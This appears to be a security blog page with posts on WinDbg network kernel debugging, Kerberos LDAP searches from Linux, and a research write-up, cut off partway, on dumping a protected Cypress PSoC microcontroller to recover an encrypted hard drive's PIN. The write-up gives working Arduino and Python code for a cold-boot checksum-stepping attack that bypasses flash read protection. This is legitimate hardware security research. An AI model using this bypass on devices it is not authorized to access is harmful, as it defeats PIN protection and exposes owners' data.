Setting up WinDbg can be a real pain. This post documents how to lessen the pain (or at least to make it less painful to do another setup).

Requirements:

  • a Windows 10 VM (I use VMware Workstation)
  • WinDbg (classic, not Preview) installed in that VM

Getting started with network KD

A few things to keep in mind:

  • the debuggee connects to the host
  • you will have no error message if things fail

The reference documentation is here but is not that practical.

Network setup

  • Clone the host VM into a target VM
  • Add a second network interface to both VMs (this could probably be done before, but I have not tested it):
    • make sure the interface hardware is supported by WinDbg
    • set it up on a specific “LAN segment” so that only those two VMs are on it
    • setup the host to be 192.168.0.1/24
    • setup the target to be 192.168.0.2/24
    • allow everything on the host firewall from this interface (or configure appropriate rules)
  • make sure you can ping the host from the target

WinDbg setup, on the target

  • go to the device manager to look up the properties of your NIC (the one on the LAN segment) and note the bus, device and function numbers
  • in an elevated shell, run the following commands, replacing the busparams values with yours, and KEY with something more secure (careful, the key must be made of four dot-separated parts):
    bcdedit /dbgsettings net HOSTIP:192.168.0.1 PORT:50000 KEY:TO.TO.TU.TU nodhcp
    bcdedit /set "{dbgsettings}" busparams 27.0.0
    bcdedit /debug on
    

If you need more information about the various options, see the documentation.

WinDbg setup, on the host:

  • run WinDbg
  • configure your symbol path to cache*c:\MySymbols;srv*https://msdl.microsoft.com/download/symbols, by either:
    • using “File->Symbol file path”
    • setting the _NT_SYMBOL_PATH environment variable
  • start a Kernel Debug session (Ctrl-K)
  • enter your KEY, press OK (port 50000 should be the default)
  • (optional) run Wireshark on your LAN segment interface, to make sure the packets are reaching your interface
  • command line to start it faster: -k net:port=50000,key=TO.TO.TU.TU

Connecting things

Now, you can reboot your target, and you should get the following in your host’s WinDbg shell:

Connected to target 169.254.221.237 on port 50000 on local IP 192.168.0.1.
You can get the target MAC address by running .kdtargetmac command.
Connected to Windows 10 18362 x64 target at (Fri Mar 27 14:41:52.051 2020 (UTC + 1:00)), ptr64 TRUE
Kernel Debugger connection established.

As you can see, since we specified the nodhcp option in the target’s config, the source IP is in the “Automatic private IP” range. So if your host’s firewall is not completely open, make sure this range is allowed.
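If you want to double check that an address seen in the connection banner really belongs to that range (169.254.0.0/16), Python's ipaddress module can do it for you:

```python
import ipaddress

target = ipaddress.ip_address("169.254.221.237")  # address from the banner above
apipa = ipaddress.ip_network("169.254.0.0/16")    # "Automatic private IP" range

print(target in apipa)        # membership test against the range
print(target.is_link_local)   # same information, using the built-in property
```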

You can make sure things work correctly by disassembling some symbol:

0: kd> u ZwQueryInformationProcess
nt!ZwQueryInformationProcess:
fffff803`697bec50 488bc4          mov     rax,rsp
fffff803`697bec53 fa              cli
fffff803`697bec54 4883ec10        sub     rsp,10h
fffff803`697bec58 50              push    rax
fffff803`697bec59 9c              pushfq
fffff803`697bec5a 6a10            push    10h
fffff803`697bec5c 488d055d750000  lea     rax,[nt!KiServiceLinkage (fffff803`697c61c0)]
fffff803`697bec63 50              push    rax

WinDbg gotchas

So, WinDbg is a weird beast, here are a few things to know:

  • lookups can be slow, for example: !object \ can take 1s per line on my setup !
  • “normal”, dot, and bang commands are, respectively: built-ins, meta commands controlling the debugger itself, commands from extensions (source).
  • numbers are in hex by default (20 => 0x20)

Cheat “sheet”

symbols

.reload /f => force symbol reload 
.reload /unl module => force symbol reload for a module that's not loaded

disassembly

u address => disassemble (ex: u ntdll+0x1000)
u . => disassemble at the current instruction pointer (eip/rip)
u . l4 => 4 lines from the current instruction pointer

breakpoints, running

bc nb => clear bp nb
bd nb => disable bp nb
bc/bd * => clear/disable all bps
bp addr => set bp
bp /1 addr => bp one-shot (deleted after first trig)
bl => list bp
ba => hardware bp
ba r 8 /p addr1 /t addr2 addr3
  => r==break RW access ; 
     8==size to monitor ; 
     /p EPROCESS address (process) ;
     /t thread address
     addr3 == actual ba address
bp addr ".if {command1;command2} .else {command}"
p => single step
pct => continue til next call or ret
gu => go til next ret

data

da - dump ascii
db - dump bytes  => displays byte + ascii
dd - dump DWords
dp - dump pointer-sized values
dq - dump QWords
du - dump Unicode (16 bits characters)
dw - dump Words
deref => poi(address)
!da !db !dq addr => display mem at PHYSICAL address

editing:

ed addr value => set value at given address
eq => qword
a addr => assemble (x86 only) at this address (empty line to finish)

structures:

dt nt!_EPROCESS addr => dump EPROCESS struct at addr

State, processes, etc

lm       => list modules
kb, kv   => callstack
!peb     => peb of current process
!teb     => teb of current thread
!process 0 0 => display all processes
!process my_process.exe => show info for "my_process.exe"
!sd addr => dump security descriptor

drivers:

!object \Driver\
!drvobj Asusgio2 => dump \Driver\Asusgio2

devices:

!devobj Asusgio2 => dump \Device\Asusgio2

memory:

!address => dump address space
!pte VA => dump PTEs for VA

Thanks

A lot of thanks to Fist0urs for the help and cheat sheet ;)

Active Directory searches from Linux

Imagine you have a Linux PC inside an Active Directory domain, and that you want to be able to request information using LDAP, over TLS, using Kerberos authentication. In theory, everything is easy, in practice, not so much.

For the impatient, here is the magic command line, provided that you already requested a valid TGT using kinit username@REALM.SOMETHING.CORP:

ldapsearch  -N  -H 'ldaps://dc.fqdn:3269' -b "dc=ou,dc=something,dc=corp" -D "username@REALM.SOMETHING.CORP" -LLL -Y GSSAPI -O minssf=0,maxssf=0 '(mail=john.doe*)' mail 

So, let’s break down the different options:

  • -N: Do not use reverse DNS to canonicalize SASL host name. If your DC has no valid reverse DNS, this is needed.
  • -H 'ldaps://dc.fqdn:3269': use TLS (ldaps), on port 3269 (Global Catalog); dc.fqdn stands for the fully qualified name of your DC
  • -b "searchbase": the root of your search, you will have to change it.
  • -D "binddn": your username@REALM, used for Kerberos (may be omitted)
  • -LLL: remove useless LDIF stuff in output
  • -Y GSSAPI: specify that we want to use GSSAPI as an SASL mechanism
  • -O minssf=0,maxssf=0: black magic to avoid problems with SASL when using TLS

You may also have to play with the LDAPTLS_REQCERT environment variable or with $HOME/.ldaprc. For example, you can put:

TLS_CACERT /full/path/to/your/ca.pem

Note that -Z does not work, as it uses StartTLS and not native TLS (ldaps).

Reminders:

  • host -t srv _ldap._tcp.pdc._msdcs.ou.org.corp to find a DC hostname
  • ldapsearch -xLLL -h ldaphostname -b "" -s base to look for the different LDAP roots
  • You need to install the required packages: libsasl2-modules-gssapi-mit (or -heimdal)
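If you end up scripting such searches, a small Python wrapper avoids retyping the options. This is just a sketch: the function name is mine, and the host, base and bind DN below are placeholders to adapt. It only builds the same command line as above.

```python
import shlex


def build_ldapsearch(uri, base, bind_dn, ldap_filter, attrs):
    """Build the ldapsearch argument list for a Kerberos (GSSAPI) search over TLS."""
    return [
        "ldapsearch", "-N",
        "-H", uri,
        "-b", base,
        "-D", bind_dn,
        "-LLL",
        "-Y", "GSSAPI",
        "-O", "minssf=0,maxssf=0",
        ldap_filter, *attrs,
    ]


cmd = build_ldapsearch(
    "ldaps://dc.example.corp:3269",        # placeholder DC name
    "dc=ou,dc=something,dc=corp",
    "username@REALM.SOMETHING.CORP",
    "(mail=john.doe*)",
    ["mail"],
)
print(shlex.join(cmd))  # pass cmd to subprocess.run() to actually run it
```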

Aigo Chinese encrypted HDD − Part 2: Dumping the Cypress PSoC 1

TL;DR

I dumped a Cypress PSoC 1 (CY8C21434) flash memory, bypassing the protection, by doing a cold-boot stepping attack, after reversing the undocumented details of the in-system serial programming protocol (ISSP).

It allows me to dump the PIN of the hard-drive from part 1 directly:

$ ./psoc.py 
syncing:  KO  OK
[...]
PIN:  1 2 3 4 5 6 7 8 9  

Code:

Introduction

So, as we have seen in part 1, the Cypress PSoC 1 CY8C21434 microcontroller seems like a good target, as it may contain the PIN itself. And anyway, I could not find any public attack code, so I wanted to take a look at it.

Our goal is to read its internal flash memory and so, the steps we have to cover here are to:

  • manage to “talk” to the microcontroller
  • find a way to check if it is protected against external reads (most probably)
  • find a way to bypass the protection

There are 2 places where we can look for the valid PIN:

  • the internal flash memory
  • the SRAM, where it may be stored to compare it to the PIN entered by the user

ISSP Protocol

ISSP ??

“Talking” to a micro-controller can imply different things from vendor to vendor but most of them implement a way to interact using a serial protocol (ICSP for Microchip’s PIC for example).

Cypress’ own proprietary protocol is called ISSP for “in-system serial programming protocol”, and is (partially) described in its documentation. US Patent US7185162 also gives some information.

There is also an open source implementation called HSSP, which we will use later.

ISSP basically works like this:

  • reset the µC
  • output a magic number to the serial data pin of the µC to enter external programming mode
  • send commands, which are actually long strings of bits called “vectors”

The ISSP documentation only defines a handful of such vectors:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V variants)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111 where dddddddd=block #
  • BULK ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1 where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111 where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1 where DDDDDDDDDDDDDDDD = Device Checksum data out
  • ERASE BLOCK

For example, the vector for Initialize-2 is:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

Each vector is made of 22-bit groups which seem to follow some pattern. Thankfully, the HSSP doc gives us a big hint: “ISSP vector is nothing but a sequence of bits representing a set of instructions.”

Demystifying the vectors

Now, of course, we want to understand what’s going on here. At first, I thought the vectors could be raw M8C instructions, but the opcodes did not match.

Then I just googled the first vector and found this research by Ahmed Ismail which, while it does not go into much detail, gives a few hints to get started: “Each instruction starts with 3 bits that select 1 out of 4 mnemonics (read RAM location, write RAM location, read register, or write register.) This is followed by the 8-bit address, then the 8-bit data read or written, and finally 3 stop bits.”

Then, reading the Technical reference manual’s section on the Supervisory ROM (SROM) is very useful. The SROM is hardcoded (ROM) in the PSoC and provides functions (like syscalls) for code running in “userland”:

  • 00h : SWBootReset
  • 01h : ReadBlock
  • 02h : WriteBlock
  • 03h : EraseBlock
  • 06h : TableRead
  • 07h : CheckSum
  • 08h : Calibrate0
  • 09h : Calibrate1

By comparing the vector names with the SROM functions, we can match the various operations supported by the protocol with the expected SROM parameters.

This gives us a decoding of the first 3 bits :

  • 100 => “wrmem”
  • 101 => “rdmem”
  • 110 => “wrreg”
  • 111 => “rdreg”
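To make the layout concrete, here is a minimal Python 3 sketch (not part of the original tooling) that splits one 22-bit instruction into mnemonic, address and data. It assumes the layout quoted above (3-bit mnemonic, 8-bit address, 8-bit data, 3 stop bits) and only handles write-style instructions made purely of 0s and 1s; read vectors contain `Z` (high-impedance) bits and are not covered. The function name `decode_instruction` is mine.

```python
# Sketch: decode one 22-bit ISSP instruction, assuming the layout
# 3-bit mnemonic | 8-bit address | 8-bit data | 3 stop bits.
MNEMONICS = {"100": "wrmem", "101": "rdmem", "110": "wrreg", "111": "rdreg"}

def decode_instruction(bits):
    """Return (mnemonic, address, data) for a 22-character string of 0/1."""
    if len(bits) != 22 or set(bits) - {"0", "1"}:
        raise ValueError("expected 22 characters of 0/1")
    mnemonic = MNEMONICS.get(bits[0:3], "unknown")
    address = int(bits[3:11], 2)   # 8-bit register or RAM address
    data = int(bits[11:19], 2)     # 8-bit value
    return mnemonic, address, data

# First three instructions of the Initialize-2 vector listed earlier
for raw in ("1101111011100000000111",
            "1101111011000000000111",
            "1001111100000111010111"):
    name, addr, val = decode_instruction(raw)
    print("%s 0x%02X, 0x%02X" % (name, addr, val))
```

With these three inputs, the decoded addresses are 0xF7, 0xF6 and 0xF8, which is a good hint that the top of the register and RAM space is where the interesting things happen.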

But to fully understand what is going on, it is better to be able to interact with the µC.

Talking to the PSoC

As Dirk Petrautzki already ported Cypress’ HSSP code on Arduino, I used an Arduino Uno to connect to the ISSP header of the keyboard PCB.

Note that over the course of my research, I modified Dirk’s code quite a lot; you can find my fork on GitHub: here, and the corresponding Python script to interact with the Arduino in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the “official” vectors to interact, trying to read the internal ROM using the VERIFY command. This failed, as expected, most probably because of the flash protection bits.

I then built my own simple vectors to read/write memory/registers.
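As an illustration, building a write instruction is just the reverse of the decoding: prefix, address, data, stop bits. The Python 3 sketch below is not the code from my fork; `encode_write` and `to_hex_bytes` are hypothetical helper names, and the three-byte form assumes the 22 bits are left-aligned and padded with two zero bits, which matches the bracketed `[DE E0 1C]` notation used in the disassembly listings of this post. Read instructions need `Z` bits where the chip drives the data line and are not handled here.

```python
def encode_write(kind, address, data):
    """Build a 22-bit write instruction as a string of 0/1."""
    prefix = {"wrmem": "100", "wrreg": "110"}[kind]
    return (prefix
            + format(address & 0xFF, "08b")
            + format(data & 0xFF, "08b")
            + "111")                      # 3 stop bits

def to_hex_bytes(bits):
    """Left-align the 22 bits in 3 bytes (assumed: 2 zero padding bits)."""
    value = int(bits, 2) << 2
    return " ".join("%02X" % b for b in value.to_bytes(3, "big"))

vec = encode_write("wrreg", 0xF7, 0x00)   # reset the flags register
print(vec, "[%s]" % to_hex_bytes(vec))
```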

Note that we can read the whole SRAM, even though the flash is protected !

Identifying internal registers

After looking at the vector’s “disassembly”, I realized that some undocumented registers (0xF8-0xFA) were used to specify M8C opcodes to execute directly !

This allowed me to run various opcodes such as ADD, MOV A,X, PUSH or JMP, which, by looking at the side effects on all the registers, allowed me to identify which undocumented registers actually are the “usual” ones (A, X, SP and PC).

In the end, the vector’s “disassembly” generated by HSSP_disas.rb looks like this, with comments added for clarity:

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00      # reset flags
[DE C0 1C] wrreg SP (f6), 0x00         # reset SP
[9F 07 5C] wrmem KEY1, 0x3A            # Mandatory arg for SSC
[9F 20 7C] wrmem KEY2, 0x03            # same
[DE A0 1C] wrreg PCh (f5), 0x00        # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03        # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80         # RAM pointer for output data
[DF 26 1C] wrreg opc1 (f9), 0x30       # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40       # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01         # BLOCK ID for SSC call
[DE 00 DC] wrreg A (f0), 0x06          # "Syscall" number : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00       # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12   # Undocumented op: execute external opcodes

Security bits

At this point, I am able to interact with the PSoC, but I need reliable information about the protection bits of the flash. I was really surprised that Cypress did not give users any means to check the protection’s status. So, I dug a bit more on Google to finally realize that the HSSP code provided by Cypress was updated after Dirk’s fork.

And lo ! The following new vector appears:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00           # Unknown args
[9F E0 1C] wrmem 0xFF, 0x00           # same
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10         # Undocumented syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

By using this vector (see read_security_data in psoc.py), we get all the protection bits in SRAM at 0x80, with 2 bits per block.

The result is depressing: everything is protected in “Disable external read and write” mode ; so we cannot even write to the flash to insert a ROM dumper. The only way to reset the protection is to erase the whole chip :(

First (failed) attack: ROMX

However, we can try a trick: since we can execute arbitrary opcodes, why not execute ROMX, which is used to read the flash ?

The reasoning here is that the SROM ReadBlock function used by the programming vectors will verify if it is called from ISSP. However, the ROMX opcode probably has no such check.

So, in Python (after adding a few helpers in the Arduino C code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)        # A = address MSB
    write_reg(0xF3, i&0xFF)      # X = address LSB
    exec_opcodes("\x28\x30\x40") # ROMX, HALT, NOP
    byte = read_reg(0xF0)        # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0])  # print ROM byte

Unfortunately, it does not work :( Or rather, it works, but we get our own opcodes (0x28 0x30 0x40) back ! I do not think it was intended as a protection, but rather as an engineering trick: when executing external opcodes, the ROM bus is rewired to a temporary buffer.

Second attack: cold boot stepping

Since ROMX did not work, I thought about using a variation of the trick described in section 3.1 of Johannes Obermaier and Stefan Tatschner’s paper: Shedding too much Light on a Microcontroller’s Firmware Protection.

Implementation

The ISSP manual gives us the following CHECKSUM-SETUP vector:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Which is just a call to SROM function 0x07, documented as follows (emphasis mine):

The Checksum function calculates a 16-bit checksum over a user specifiable number of blocks, within a single Flash bank starting at block zero. The BLOCKID parameter is used to pass in the number of blocks to checksum. A BLOCKID value of ‘1’ will calculate the checksum of only block 0, while a BLOCKID value of ‘0’ will calculate the checksum of 256 blocks in the bank. The 16-bit checksum is returned in KEY1 and KEY2. The parameter KEY1 holds the lower 8 bits of the checksum and the parameter KEY2 holds the upper 8 bits of the checksum. For devices with multiple Flash banks, the checksum function must be called once for each Flash bank. The SROM Checksum function will operate on the Flash bank indicated by the Bank bit in the FLS_PR1 register.

Note that it is an actual checksum: bytes are summed one by one, no fancy CRC here. Also, considering the extremely limited register set of the M8C core, I suspected that the checksum would be directly stored in RAM, most probably in its final location: KEY1 (0xF8) / KEY2 (0xF9).

So the final attack is, in theory:

  1. Connect using ISSP
  2. Start a checksum computation using the CHECKSUM-SETUP vector
  3. Reset the CPU after some time T
  4. Read the RAM to get the current checksum C
  5. Repeat 3. and 4., increasing T a little each time
  6. Recover the flash content by subtracting consecutive checksums C
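The arithmetic behind the last step can be sketched offline, without any hardware. The Python 3 snippet below models the checksum as a plain 16-bit running sum (an assumption consistent with the SROM description quoted above) and assumes an ideal capture with exactly one sample after each byte; `running_checksums` and `recover_bytes` are illustrative names, not functions from psoc.py.

```python
def running_checksums(flash):
    """Model: 16-bit running byte sum, one value after each byte."""
    total, out = 0, []
    for b in flash:
        total = (total + b) & 0xFFFF
        out.append(total)
    return out

def recover_bytes(samples):
    """Recover bytes from consecutive checksum samples (one per byte)."""
    previous, out = 0, []
    for c in samples:
        out.append((c - previous) & 0xFF)  # each step adds exactly one byte
        previous = c
    return bytes(out)

flash = bytes([0x80, 0x67, 0x30])          # toy input for the model
samples = running_checksums(flash)
print(["%04X" % c for c in samples])
print(recover_bytes(samples).hex())
```

In practice the hard part is not the subtraction but getting exactly one clean sample per byte, since a missed or duplicated sample shifts everything after it.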

However, we have a problem: the Initialize-1 vector, which we have to send after reset, overwrites KEY1 and KEY2:

1100101000000000000000                 # Magic to put the PSoC in prog mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A            # Checksum overwritten here
[9F 20 7C] wrmem KEY2, 0x03            # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09          # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00       # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

But this code, overwriting our precious checksum, is just calling Calibrate1 (SROM function 9)… Maybe we can just send the magic to enter prog mode and then read the SRAM ?

And yes, it works !

The Arduino code implementing the attack is quite simple:

    case Cmnd_STK_START_CSUM:
      checksum_delay = ((uint32_t)getch())<<24;
      checksum_delay |= ((uint32_t)getch())<<16;
      checksum_delay |= ((uint32_t)getch())<<8;
      checksum_delay |= getch();
      if(checksum_delay > 10000) {
         ms_delay = checksum_delay/1000;
         checksum_delay = checksum_delay%1000;
      }
      else {
         ms_delay = 0;
      }
      send_checksum_v();
      if(checksum_delay)
          delayMicroseconds(checksum_delay);
      delay(ms_delay);
      start_pmode();

  1. It reads the checksum_delay
  2. Starts computing the checksum (send_checksum_v)
  3. Waits for the appropriate amount of time, with some caveats:
    • I lost some time here until I realized that delayMicroseconds is only precise up to 16383µs
    • and then again because delayMicroseconds(0) is totally wrong !
  4. Resets the PSoC to prog mode (without sending the initialization vectors, just the magic)

The final Python code is:

for delay in range(0, 150000):                          # delay in microseconds
    for i in range(0, 10):                              # number of reads for each delay
        try:
            reset_psoc(quiet=True)                      # reset and enter prog mode
            send_vectors()                              # send init vectors
            ser.write("\x85"+struct.pack(">I", delay))  # do checksum + reset after delay
            res = ser.read(1)                           # read arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 > /dev/null 2>&1")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5)  # open serial port
            continue
        print "%05d %02X %02X %02X" % (delay,           # read RAM bytes
                                       read_regb(0xf1),
                                       read_ramb(0xf8),
                                       read_ramb(0xf9))

What it does is simple:

  1. Reset the PSoC (and send the magic)
  2. Send the full initialization vectors
  3. Call the Cmnd_STK_START_CSUM (0x85) function on the Arduino, with a delay argument in microseconds.
  4. Read the checksum (0xF8 and 0xF9) and the undocumented 0xF1 register

This is repeated 10 times for each 1 microsecond step.

0xF1 is included as it was the only register that seemed to change while computing the checksum. It could be some temporary register used by the ALU ?

Note the ugly hack I use to reset the Arduino using picocom, when it stops responding (I have no idea why).

Reading the results

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 is the unknown reg
                # F8 is the checksum LSB
                # F9 is the checksum MSB

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # Checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # First byte is 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00  # 2nd byte is 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # I have no idea what's going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 is back ?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Oh ! Carry is propagated to MSB
00063 01 17 01
[...]
00075 CC 17 01  # So 0x117-0xE7: 0x30

However, since this is a real checksum, a null byte does not change the value, so we cannot simply look for changes in the checksum. But, since the full (8192 bytes) computation runs in 0.1478s, which translates to about 18.04µs per byte, we can use this timing to sample the value of the checksum at the right points in time.
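The per-byte figure, and a rough idea of where to sample, can be computed as follows. This is a back-of-the-envelope Python 3 sketch: the 24µs offset for the first byte is read off the log above, and assuming perfectly regular timing is exactly what breaks down towards the end of the dump, so `sample_delay` (a name I made up) only gives a starting point.

```python
TOTAL_SECONDS = 0.1478   # measured duration of the full checksum
FLASH_SIZE = 8192        # bytes covered by the checksum

US_PER_BYTE = TOTAL_SECONDS * 1e6 / FLASH_SIZE

def sample_delay(index, first_byte_delay=24):
    """Approximate delay (in µs) at which byte `index` has been summed.

    first_byte_delay is an assumption taken from the log above, where
    the first byte shows up in the checksum at a delay of 24µs.
    """
    return int(round(first_byte_delay + index * US_PER_BYTE))

print("%.2f µs per byte" % US_PER_BYTE)
for i in range(3):
    print(i, sample_delay(i))
```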

Of course at the beginning, everything is “easy” to read as the variation in execution time is negligible. But the end of the dump is less precise as the variability of each run increases:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

Hence the 10 dumps for each µs of delay. The total running time to dump the 8192 bytes of flash was about 48h.
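One simple way to use the repeated reads is a majority vote per delay. The Python 3 sketch below is not the decoder I still have to write, only a first step under the assumption that the most frequent value at a given delay is the right one. That assumption fails around transitions, where two values can get almost the same number of votes, so such delays still need a manual look. The function name `vote` is hypothetical.

```python
from collections import Counter, defaultdict

def vote(lines):
    """Map each delay to (most frequent 16-bit checksum, number of votes)."""
    by_delay = defaultdict(Counter)
    for line in lines:
        fields = line.split("#")[0].split()   # drop trailing comments
        if len(fields) != 4:
            continue                          # skip "[...]" and blank lines
        try:
            delay = int(fields[0])
            lsb, msb = int(fields[2], 16), int(fields[3], 16)
        except ValueError:
            continue                          # skip the header line
        by_delay[delay][(msb << 8) | lsb] += 1
    return {d: c.most_common(1)[0] for d, c in by_delay.items()}

# A few lines in the same format as the script output
SAMPLE = """\
DELAY F1 F8 F9
00057 CC E7 00
00057 CC E7 00
00057 01 17 01
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00
00058 D0 17 01
""".splitlines()

for delay, (csum, votes) in sorted(vote(SAMPLE).items()):
    print("%05d %04X (%d votes)" % (delay, csum, votes))
```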

Reconstructing the flash image

I have not yet written the code to fully recover the flash, taking into account all the timing problems. However, I did recover the beginning. To make sure it was correct, I disassembled it with m8cdis:

0000: 80 67     jmp   0068h         ; Reset vector
[...]
0068: 71 10     or    F,010h
006a: 62 e3 87  mov   reg[VLT_CR],087h
006d: 70 ef     and   F,0efh
006f: 41 fe fb  and   reg[CPU_SCR1],0fbh
0072: 50 80     mov   A,080h
0074: 4e        swap  A,SP
0075: 55 fa 01  mov   [0fah],001h
0078: 4f        mov   X,SP
0079: 5b        mov   A,X
007a: 01 03     add   A,003h
007c: 53 f9     mov   [0f9h],A
007e: 55 f8 3a  mov   [0f8h],03ah
0081: 50 06     mov   A,006h
0083: 00        ssc
[...]
0122: 18        pop   A
0123: 71 10     or    F,010h
0125: 43 e3 10  or    reg[VLT_CR],010h
0128: 70 00     and   F,000h ; Paging mode changed from 3 to 0
012a: ef 62     jacc  008dh
012c: e0 00     jacc  012dh
012e: 71 10     or    F,010h
0130: 62 e0 02  mov   reg[OSC_CR0],002h
0133: 70 ef     and   F,0efh
0135: 62 e2 00  mov   reg[INT_VC],000h
0138: 7c 19 30  lcall 1930h
013b: 8f ff     jmp   013bh
013d: 50 08     mov   A,008h
013f: 7f        ret

It looks good !

Locating the PIN address

Now that we can read the checksum at arbitrary points in time, we can check easily if and where it changes after:

  • entering a wrong PIN
  • changing the PIN

First, to locate the approximate location, I dumped the checksum in steps for 10ms after reset. Then I entered a wrong PIN and did the same.

The results were not very nice as there’s a lot of variation, but it appeared that the checksum changes between 120000µs and 140000µs of delay. Which was actually completely false and an artefact of delayMicroseconds doing nonsense when called with 0.

Then, after losing about 3 hours, I remembered that the SROM’s CheckSum syscall has an argument that allows specifying the number of blocks to checksum ! So we can easily locate the PIN and “bad PIN” counter down to a 64-byte block.

My initial runs gave:

No bad PIN          |   14 tries remaining  |   13 tries remaining
                    |                       |
block 125 : 0x47E2  |   block 125 : 0x47E2  |   block 125 : 0x47E2
block 126 : 0x6385  |   block 126 : 0x634F  |   block 126 : 0x6324
block 127 : 0x6385  |   block 127 : 0x634F  |   block 127 : 0x6324
block 128 : 0x82BC  |   block 128 : 0x8286  |   block 128 : 0x825B

Then I changed the PIN from “123456” to “1234567”, and I got:

No bad try            14 tries remaining
block 125 : 0x47E2    block 125 : 0x47E2
block 126 : 0x63BE    block 126 : 0x6355
block 127 : 0x63BE    block 127 : 0x6355
block 128 : 0x82F5    block 128 : 0x828C

So both the PIN and “bad PIN” counter seem to be stored in block 126.
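The comparison can be written down as a small Python 3 sketch, using the values from the first table. The dictionary keys are simply the block labels from the table, and the helper names are mine. The useful sanity check is that the difference between the two runs stays constant after the first changed block, which means nothing else changed further on.

```python
# Checksums from the table above, keyed by block label
NO_BAD_PIN = {125: 0x47E2, 126: 0x6385, 127: 0x6385, 128: 0x82BC}
TRIES_14 = {125: 0x47E2, 126: 0x634F, 127: 0x634F, 128: 0x8286}

def first_difference(before, after):
    """Return the first block label where the two runs differ, or None."""
    for label in sorted(set(before) & set(after)):
        if before[label] != after[label]:
            return label
    return None

def deltas(before, after):
    """16-bit difference between the two runs for each block label."""
    return {label: (before[label] - after[label]) & 0xFFFF
            for label in sorted(set(before) & set(after))}

print("first changed block:", first_difference(NO_BAD_PIN, TRIES_14))
for label, delta in deltas(NO_BAD_PIN, TRIES_14).items():
    print("block %d: delta 0x%04X" % (label, delta))
```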

Dumping block 126

